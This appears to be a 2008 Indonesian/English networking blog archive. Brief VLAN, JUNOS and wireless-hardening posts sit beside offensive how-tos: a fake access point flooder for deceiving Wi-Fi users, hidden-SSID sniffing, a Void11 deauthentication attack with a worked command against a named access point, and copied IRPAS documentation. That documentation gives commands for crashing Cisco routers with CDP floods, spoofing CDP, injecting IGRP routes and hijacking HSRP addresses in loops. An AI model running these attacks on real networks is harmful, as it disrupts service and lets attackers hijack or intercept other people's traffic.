Senin, 30 Juni 2008

IEEE 802.1Q-in-Q VLAN Tag (QinQ)

The IEEE 802.1Q-in-Q VLAN Tag is purpose to expand the VLAN space by tagging the tagged packets, thus producing a "double-tagged" frame. The expanded VLAN space allows the service provider to provide certain services, such as Internet access on specific VLANs for specific customers, and yet still allows the service provider to provide other types of services for their other customers on other VLANs.


Juniper OS :: JUNOS and JUNOSe

I'm intersted in oprating system it means their managements for instance process management,memory management and so on also on deadlock detection/avoidance,file system,scheduling strategies and .... I think freeBSD has the best managements and works properly although other OS like SUN Solaris is powerful but FreeBSD is categurised in non-commercial operating system and it comes with full source code. in fact i wanna talk about JUNOS that based on the FreeBSD , first of all please don't pronounce JUN-OS ,you should pronounce just in one syllable.Juniper appliances have JUNOS as operating system which based on the FreeBSD they've modified the freeBSD,extracted some modules and imported specially modified modules and some engines on it. the JUNOS has some parts contain : JKernel (The operating system package) JRoute (The routing engine software) JPFE (The PFE software) JDocs (Updated online reference documentation) Jcrypto (Security software (U.S. domestic only)) Jbase (Additions to JUNOS) Totally they called Jbundle.

Juniper Networks releases several new versions of JUNOS software each year. you can see some feature of JUNOS : - Modularity - JUNOS software employs a modular software design, providing superior resilience and ensuring that new capabilities such as IPv6 can be easily integrated - Routing expertise - Juniper Networks IP routing expertise delivers a full complement of production-hardened routing protocols - Standards-based - thoughtful adherence to industry standards for routing, MPLS, and availability mechanisms such as Protocol Graceful Restart translates to improved stability and reduced operational complexity for customers - Security - JUNOS software combines intelligent packet processing with superior performance to offer customers a potent IP security toolkit - Service richness - whether individual subscriber, enterprise business, or service provider, JUNOS IP services portfolio enables customers to deliver assured experiences to end users of any profile - Policy and control - Juniper Networks SDX and NMC platforms allow customer to invoke and control these powerful JUNOS capabilities; in addition, Juniper Networks JUNOScript XML interface simplifies and accelerates OSS integration Modular software architecture The Juniper appliences load JUNOS from flash memory but they have hard disk for other purpose like syslogs,Backup and so on thereby when they want to become shutdown they should be manually turned off from OS it means execute halt command (request system halt). there isn't any concern about blackout without the shutting down command because at next boot , maybe it takes a few time for checking file system on hard disk drive so if it fails in the worst situation the applience will boot successfully and works properly because the JUNOS is on flash and in this case we don't have backup and logs and so on. Another OS from Juniper is JUNOSe,it's the operating system that powers Juniper Networks market-leading E-series family of edge routers.the Juniper web site said "twenty of the top twenty-five service providers in the world use JUNOSe in their production networks, delivering profitable service to end-user customers. Major publicly announced deployments include: Bell Canada, Cable & Wireless, Deutsche Telekom, France Telecom, Korea Telecom, PCCW, Telstra, Telefonica, XO, and many others.JUNOSe is specifically architected to help service providers migrate from traditional “best effort” IP services to enhanced IP services based on the infranet model." Totally JUNOSe is specifically architectured to address and overcome the challenges that's service provider face at the edge. Some new service in JUNOSe : - Hierarchical QoS capabilities to deliver a voice and data service. - Virtual router and MPLS 2547 VPN technologies. - rolling out IPTV and Video on Demand - A service provider using the per-VLAN queuing, rate limiting, and policy. and .... You can get more information about JUNOS and JUNOSe at the Juniper web site :

Sabtu, 28 Juni 2008

Fake AP -- Mendirikan Ribuan Access Point Palsu -

kali ini edwinwbs mau ngebahas tentang bagaimana cara membuat Fake AP.
Fake AP menghasilkan ribuan access point palsu,
gunanya adalah dapat menipu pengakses jaringan wireless dan juga dapat membingungkan hasil pelacakan melalui aplikasi wardrivers, NetStumbler.

Persiapannya nih.... :
1. WiFi Card berbasis chipset Prism2/2.5/3
2. Download aplikasi Fake Ap dari :

Cara meramu Fake Ap nya begini :

1. Compile the Host AP driver dan bisa Anda ambil disini -
Anda juga membutuhkan CVS snapshot driver untuk meng 'enable ' fungsi
MAC switching.
2. Edit '' untuk mereflect settingan dan paths.
3. Run '' dengan user : root
4. Have fun... Wink yyeeeaaahhhh........

Usage: --interface wlanX [--channel X] [--mac XX:XX...]
[--essid NAME] [--words FILENAME] [--sleep N] [--vendors FILENAME]
[--wep N] [--key KEY] [--power N]

--channel X ---> Use static channel X
--essid NAME ---> Use static ESSID NAME
--mac XX:XX... ---> Use static MAC address XX:...
--words FILE ---> Use FILE to create ESSIDs
--sleep N ---> Sleep N Ssec between changes, default 0.25
--vendor FILE ---> Use FILE to define vendor MAC prefixes
--wep N ---> Use WEP with probability N where 0 <> Use KEY as the WEP key. Passed raw to iwconfig
--power N ---> Vary Tx power between 1 and N. In milliwatts

Amankan Jaringan Wireles Anda!!

Solusi berikut memang tidak akan membuat jaringan anda 100% secure. Ingat kata-kata klasik... di dunia yang tidak sempurna ini,
tidak ada sesuatu yang 100% secure! Hal-hal berikut ini hanya akan meminimalisir serangan yang berpotensi untuk merusak jaringan anda.

1. Ubahlah Password Default Access Point. Banyak serangan yang terjadi adalah karena segalanya dibiarkan pada setting default,
termasuk password. Kebanyakan penyerang biasanya akan berfikiran hal yang satu ini, yaitu berharap bahwa sang target belum mengubah
password defaul Access Point.

2. Ubahlah IP default. Dahulu hal ini kurang memungkinkan untuk dilakukan. Namun dewaas ini sudah banyak merek-merek Access Point yang
memiliki fasilitas ini.

3. Aktifkan metode enkripsi. Pergunakan enkripsi WPA dengan Pre Shared Key (WPA-PSK).Berikan juga password yang "aman", dalam artian
sulit ditebak dan tidak memiliki arti. Anda juga bisa memanfaatkan enkripsi WPA dengan Temporal Key Integrity Protokol.

4. Matikan fungsi Broadcast SSID. Dengan demikian, maka SSID Anda tidak akan terdeksi pada proses War Driving. Akan tetapi.. kabar buruknya
(atau kabar baik??), saat ini sudah ada beberapa aplikasi scanning yang bisa menditeksi SSID yang terhidden. Yeah, walaupun demikian
anda tetap bisa melindungi SSID dengan cara merubah nama SSID default dengan nama SSID yang sulit ditebak.

5. Gunakan MAC Address Filtering. Hal ini berguna untuk mengurangi aktivitas penysupan.

6. Non Aktifkan DHCP. Gunakan IP Static dengan nilai yang jarang digunakan.

7. Gunakan Security tambahan seperti CaptivePortal atau aplikasi lainnya yang di inject pada firmware Access Point.

8. Pergunakan software seperti Mc Afee Wireless Home Security untuk melakukan Access Point Monitoring via Client.

Hidden SSID Sniffing

uuuppsss.... kali ini edwinwbs mau ngabahas bagaimana caranya mencuri SSID yang terhidden. Maksudnya terhidden disini artinya si Admin mematikan fungsi SSID broadcasting (SSID Broadcasting Disable).

Apa yang terjadi bila si Admin melakukan penghiddenan terhadap SSID... yang pasti SSID tidak akan terbaca oleh siapapun yang melakukan wardriving.
Nah, gimana caranya menangkap SSID yang broadcastingnya disable...??? salah satunya dengan memanfaatkan SSIDSniff. Mungkin tidak hanya dengan SSIDSniff saja kok... banyak apklikasi2 lain yang bisa digunakan... tapi kali ini saya mempergunakan aplikai yang bernama SSIDSniff karena lebih oke dan bagus dibandingkan dengan aplikasi lainnya.

SSIDSiff merupakan tools yang bisa membantu kita dalam melakukan penetrasi test terhadap jaringan wireless.
SSIDSniff bisa digunakan dibeberapa wireless card yang mendukung frame 802.11.
SSIDSniff mempergunakan header packet 802.11 yang mampu menampilkan jaringan wireless (AP) yang sedang aktif.
SSIDSniff dikembangkan dan dapat bekerja dengan baik pada system operasi Linux.

Keunggulan SSIDSniff :
- Mudah dipergunakan (-- menurut saya lohhh.... ;
- Mampu mengurutkan packet data dengan kriteria : packets per second, number of data packets, dll.
- Dapat menangkap data tertentu dari (banyak sumber data) dan dapat dibuatkan file yang kompatible dengan libpcap capture files.
- Memberikan sebuah pesan seperti pergerakan cursordari suatu isi packet data
- Notifikasi berupa Audio dari kegiatan Wireless
- cccaaapppeee dddeeehhhhh......

Hardware yang Compatible (tested) :
- Cisco PCM-340, PCM-350
- Intel ipw2100
- Belskin WiFi Card
- Atheros

Cara mempergunakan :
- donlod di :
- Unpack & Compile
- Konfigurasi khan wireless card Anda utk dapat menerima packer data (raw frame) 802.11
Dokumentasi dapat Anda baca disini : google aza ya mas.... aku lupa alamatnya...caaapppeee ddeehhh...
- Start ssidsniff as root: shell# ./ssidsniff -i

Kendala yang mebatasi SSIDSniff :
- Signal quality/noise level : sangat menentukan sekali dalam proses Sniffing
- SSIDSniff belum mampu melaukan Channel hopping

Melumpuhkan Access Point dengan Void11

Wah, lirva32 mau ngajarin iseng2 nih... kali ini lirva mau melakukan DoS pada Access Point...
Jadi nanti AP akan dibanjiri dengan paket2 data... kalo udah banjir tuh AP bakalan ngedrop..
Gimna caranya...?? nanti dulu... lirva mau menjelaskan aplikasinya dulu....

Void11 merupakan salah satu aplikasi yang digunakan unutk melakukan mass flooding terhadap Access Point.
Void11 memiliki jenis metode attack, yaitu :

1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan 'deauthentication packets' sehingga
client yang terautentikasi didalam jaringannya akan ngedrop dan terputus dari jaringan WLAN.

2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point dengan 'authentication packets (random client MACs)'

3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets (random client MACs)

Persiapan :

+ komputer | laptop yang udah ada wificard dengan chipset Prism.
+ Lakukan Wardriving utk mendapatkan MAC Address + SSID AP si target
+ Donlod void11 dari :
+ Konfigurasi :

cd /tools/wifi/void11-0.2.0/console

iwconfig wlan0 mode master

iwpriv wlan0 hostapd 1


alternatif void_hopper mode juga bisa meprgunakan :

iwconfig wlan0 channel 6 (set card to channel 6)

Penggunaan :
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]

Penyerangan :

Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka saya awali dulu dengan melakukan wardriving...biasanya saya mepergunakan kismet.
Dari hasil wardriving saya mendapatkan :

SSID : linksys
mAC : 00:06:BF:64:AB:35

Siapakan penyerangan sbb :

void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35

wah... APnya ngedrop... restart..... he..he....
selamat menikmati... lirva tidak bertangung jawab atas tindakan destruktif apapun....

IRPAS (Internetwork Routing Protocol Attack Suite)

satu lagi suite/kumpulan tool terbaik, kali untuk routing protokol internet dll. IRPAS, download di

ini dokumentasi lengkapnya (masih versi bule :)


IRPAS contains at the moment the following tools:
This program is for sending CDP (Cisco router Discovery Protocol) messages to the wire.
As the name suggests, this tool is for sending Interior Gateway Routing Protocol messages.
As the name suggests, this tool is for sending ICMP router discovery protocol messages.
Waits for IRDP requests and sends out response packets to fool clients.
ASS is a Autonomous System Scanner. Because routing protocols use autonomous systems to distinguish between various routing “domains” and various ways to communicate, you need something which works like a TCP port scanner but knows more then one protocol. This is ASS.
sends out raw ethernet frames from files
traceroute(1) by ICMP echo request
traceroute(1) by TCP SYN packets
enumeration / ping-sweep tool
ICMP netmask request
IP protocol scanner
HSRP takeover tool
These tools are not point-and-click. You should at least know, what you want to do with the particular protocol. So if you are not familiar with CDP, don´t try to use it.
CDP is a layer 2 protocol used by Cisco routers to discover each other on the same link (segment). This protocol is not routed and therefore this tool is just usefull in the local segment. CDP messages contain information about the sending Cisco router. These include the device ID (hostname), port ID (which port was the sender), the platform running on, the software incl. version, what the box is capable of and which network address (IP address) the interface has. If not configured otherwise, Cisco routers send these messages out every 30 seconds. In our case (ethernet), they are send to a special MAC address (01:00:0C:CC:CC:CC) and therefore are received from every Cisco router in the same segment. Other routers store the data and hold it for a time defined in the message (the tool uses the maximum of 255 seconds).
Very interesting is, that Cisco IOS uses the device ID as key to find out if the received message is an update and the neighbor is already known or not. If the device ID is to long, this test seems to fail and you constantly fill up the routers memory.

The CDP tool can be used in two different modi:
The flood mode is used to send garbage CDP messages to the wire, which has different effects to the routers depending on their IOS version. It is not tested very well, which version of IOS reacts in which way on which kind of Cisco hardware. So if you come across somthing, please report it. IOS 11.1(1) was tested and the router could match even long device id´s but rebooted after receiving three or four random device id names. Most other IOS versions just store the message and fill up the memory. When you try to debug CDP events, all IOS we tested crashed and reboot.
To use CDP, you have to specify the ethernet interface you will be working on: -i eth0
Everything else is optional.
-v verbose
-n x send x packets
-l x length of the device id string. Keep in mind, that the
whole ethernet frame has to be smaller the 1514 bytes.
The maximum length is therefore 1480 for the device id
(default is 1400)
-c c fills the device id with the char ‘c’
(default is ‘A’)
-r makes the device id a random string of characters, which
leads to no matching on the receiver Cisco and to memory fillup
or crash


./cdp -i eth0 -n 10000 -l 1480 -r

Hint: if you want to flood the routers completly, start two processes of cdp with different sizes. One of them running on full size (1480) to fill up the major part of the memory and another to fill up the rest with a length of 10 octets.
The second mode for CDP is spoofing. You can enable this mode with the command line option -m 1. It has no actuall use for attacking router and is mostly targeted fro social engineering or just to confuse the local administrator. It is used to send out 100% valid CDP infromation packets which look like generated by other Cisco routers. Here, you can specify any part of a CDP message yourself.
-i ethernet interface
-v verbose
-D device id string
-P port id string
-L platform string
-S software string
-F ip address of the interface
-C the capabilities of the device you are claiming to be:
R - Router, T - Trans Bridge, B - Source Route Bridge,
S - Switch, H - Host, I - IGMP, r - Repeater
Combine the letters to a string: RI means Router and IGMP

./cdp -v -i eth0 -m 1 -D ‘Hacker’ -P ‘Ethernet0′ -C RI \
-L ‘Intel’ -S “`uname -a`” -F ‘′

Which results on the cisco router in the following information:
cisco#sh cdp neig detail
Device ID: Hacker
Entry address(es):
IP address:
Platform: Intel, Capabilities: Router IGMP
Interface: Ethernet0, Port ID (outgoing port): Ethernet0
Holdtime : 238 sec

Version :
Linux attack 2.2.10 #10 Mon Feb 7 19:24:43 MET 2000 i686 unknown

IGRP is a tool for route injection. The routing protocol IGRP is no longer really widely used in the outside world, but for the first steps, we decided to use this one as a starting point.
The whole purpose is to define a routing table with all possible parameters by hand without having your system actually running any kind of dynamic routing and sending this information out to the victim system(s). Since IGRP is a broadcast based protocol, the default behavior is to send these messages to the ip broadcast address ( If you want to inject a route to a system remote from you, you have to address the ‘update’ accordingly and make sure that you send the packet(s) with the right source address, so the victim system accepts the update.
Before using the tool, you have to design your routing table you want to inject in the target router. It should contain data which makes your route the prefered one for the victim. The format is:


where destination is the network (, delay is in ms/10, bandwith in MBit per second, MTU is the maximum transfer unit (1500 for ethernet), reliability and load are in percent (255=100%, 1=0%) and hopcount just in hops.
Empty lines and lines beginning with # are ignored.
# Routes file for igrp.c
# FX
# Phenoelit (
# Format
# destination:delay:bandwith:mtu:reliability:load:hopcount
# Examples

Usage: ./igrp -i -f -a
-i interface
-v verbose
-f file, which contains the routes
(as much as you like)
-a autonomous system the IGRP process is running
on, use ASS to find it out or specify a
range to use with -a START -b STOP to send
updates to all AS from START to STOP
(I highly recommend using ASS for this!!)
-S maybe you need this
-D If you don’t specify this, the broadcast
address is used

If you want the routes to be persistent (after some testing around), make up a shell loop and run the program within this loop every 25-30 seconds, to keep the victim beliving your routes.
ASS, the autonomous system scanner, is designed to find the AS of the router. It supports the following protocols: IRDP, IGRP, EIGRP, RIPv1, RIPv2, CDP, HSRP and OSPF.
In passive mode (./ass -i eth0), it just listens to routing protocol packets (like broadcast and multicast hellos).
In active mode (./ass -i eth0 -A), it tries to discover routers by asking for information. This is done to the appropriate address for each protocol (either broadcast or multicast addresses). If you specify a destination address, this will be used but may be not as effective as the defaults.
EIGRP scanning is done differently: While scanning, ASS listens for HELLO packets and then scans the AS directly on the router who advertised himself. You can force EIGRP scanning into the same AS-Scan behavior as IGRP uses by giving a destination or into multicast scanning by the option -M.
For Active mode, you can select the protocols you want to scan for. If you don’t select them, all are scanned. You select protcols by giving the option -P and any combination of the following chars: IER12, where:
1 = RIPv1
2 = RIPv2
Usage is trival:
./ass [-v[v[v]]] -i [-p] [-c] [-A] [-M] [-P IER12]
-a -b
[-S ] [-D ]
[-T ]

-i interface
-v verbose
-A this sets the scanner into active mode
-P see above (usage: -P EIR12)
-M EIGRP systems are scanned using the multicast
address and not by HELLO enumeration and
direct query
-a autonomous system to start from
-b autonomous system to stop with
-S maybe you need this
-D If you don’t specify this, the appropriate
address per protocol is used
-p don’t run in promiscuous mode (bad idea)
-c terminate after scanning. This is not
recommened since answers may arrive later and
you could see some traffic that did not show
up during your scans
-T packets how many packets should we wait some
miliseconds (-T 1 is the slowest scan
-T 100 begins to become unreliable)

I really suggest to use -v !
I’m not going to explain why you do not get answers from routers in the Internet. If you don´t know what the ‘network x.y.z.0′ statement for cisco means, forget that you know this program exists (sorry..)
ASS output might look a little strange, but has it’s meanings:

Routers are identified by the sender’s IP address of the packet. This may lead to several routers showing up as more then one since they used different sender interfaces. In the brackets, the protocols this router runs are shown.
Routing protocols are shown as one or more indented lines. First, there is the routing protocol name (like EIGRP), followed by the autonomous system number in brackets. Aligned to the right is the target network if applicable.
IGRP routing info shows the target network and in brackets the following values: Delay, Bandwidth, MTU, Reliability, Load and Hopcount.
The IRDP info is limmited to the announced gateway (router) and it’s preference
RIPv1 info just gives you the classified target network (remember RIPv1 network boundaries) and it’s metric
RIPv2 info contains after the target network the following infos: Netmask, next hop, arbitary tag, and the metric. An additional line may appear on the routers section that gives you the authentication if enabled in the protocol. For text auth, the password is there.
EIGRP basic
The basic EIGRP just gives you the autonomous system number, the IOS and EIGRP version as found in the HELLO packet
EIGRP routes
The EIGRP routes section depends on the type of route. All of them include the fields destination network, destination mask and in the last line (in brackets) the values for Delay, Bandwidth, MTU, Reliability, Load and Hopcount. External routes also include the originating router, the originating autonomous system, the external metric and the source of this route.
HSRP info is not routing, therefore the third field is the virtual IP address of the standby group, followed by the state, the auth string, Hello, Hold and priority values.
OSPF info includes the destination network as well as the Area in IP format, the authentication used (and, if applicable the auth string), netmask, designated and backup router and the values for Dead, Priority and Hello.
This tool sends out IRDP responses. Nothing else ;)
-i interface
-p preference of this entry, default is 0
-l lifetime of the entry, default: 1800
-S maybe you need this
-D If you don’t specify this, the broadcast
address is used

Sniffer, which listens to IRDP requests (solicitation) and answers. Sends out periodic updates.
-v verbose
-P enable promiscuous mode
-i interface
-p preference of this entry, default is 0
-l lifetime of the entry, default: 1800
-S maybe you need this
-D If you don’t specify this, the
broadcast address is used

This tool is perfect to find new vulnerabilities and test concepts. It sends out any binary file as Ethernet frame - AS IT IS. So make sure you know what you do. Hint: use xxd from the vim package to produce the binary file from hex dumps.
-v verbose (hex dump to screen)
-i interface
-f the file you want to send

Itrace is a program that implements traceroute(1) functionality using ICMP echo request packets. Therefore, it looks like you are just pinging your target while you traceroute there. It often helps tracing behind firewalls.
Usage: ./itrace -i eth0 -d
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timout after x seconds (default=3)
-i interface the normal eth0 stuff
-d destination Name or IP of destination

TCtrace is like itrace a traceroute(1) brother - but it uses TCP SYN packets to trace. This makes it possible for you to trace through firewalls if you know one TCP service that is allowed to pass from the outside.
Usage: ./tctrace -i eth0 -d
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timout after x seconds (default=3)
-D x Destination port x (default=80)
-S x Source port x (default=1064)
-i interface the normal eth0 stuff
-d destination Name or IP of destination

netenum can be used to produce lists of hosts for other programs. It’s not as powerful as other ping-sweep tools, but it’s simple. When giving a timeout, it uses ICMP echo request to find available hosts. If you don’t supply a timeout, it just prints an IP address per line, so you can use them in shell scripts.
Usage: ./netenum
netenum [timout] [verbosity]

destination can be in the following formats:
dotted IP address:
IP and Netmask:
IP and “slashmask”:

timeout applies for the whole operation!
verbosity is between 0 (quiet) to 3 (verbose)

An application would be a remote HSRP attack:
for i in `netenum`
./hsrp -d ${i} -v192.168.1.22 -a cisco -g 1 -i eth0

netmask asks for the netmask by ICMP.
Usage: ./netmask -d destination -t timeout
Protos is a IP protocol scanner. It goes through all possible IP protocols and uses a negative scan to sort out unsupported protocols which should be reported by the target using ICMP protocol unreachable messages.
Usage: ./protos -i eth0 -d -v
-v verbose
-V show which protocols are not supported
-u don’t ping targets first
-s make the scan slow (for very remote devices)
-L show the long protocol name and it’s reference (RFC)
-p x number of probes (default=5)
-S x sleeptime is x (default=1)
-a x continue scan afterwards for x seconds (default=3)
-d dest destination (IP or IP/MASK)
-i interface the eth0 stuff
-W don’t scan, just print the protocol list

Normal output for a Windows host looks like this: may be running (did not negate):

While a cisco router supports more: may be running (did not negate):

HSRP protcol can be used to take over an HSRP standby IP or to force a switchover or to DoS this IP: Usage: ./hsrp -i eth0 -v -d -a cisco -g 1
-i int the eth0 stuff
-v ip the standby IP address
-d dest the destination IP (multicast or directed)
-a auth the password (default=”cisco”)
-g x the standby group
-S source spoofed source if desired

To take over the standby IP from all HSRP routers to the VIPPR IP use
while (true)
./hsrp -d -v -a cisco -g 1 -i eth0 -S
sleep 3

To force into standby (and therefore having another HSRP router taking over) use
while (true)
./hsrp -d -v -a cisco -g 1 -i eth0
sleep 3

Since the others will not see these messages, you can force failovers all the way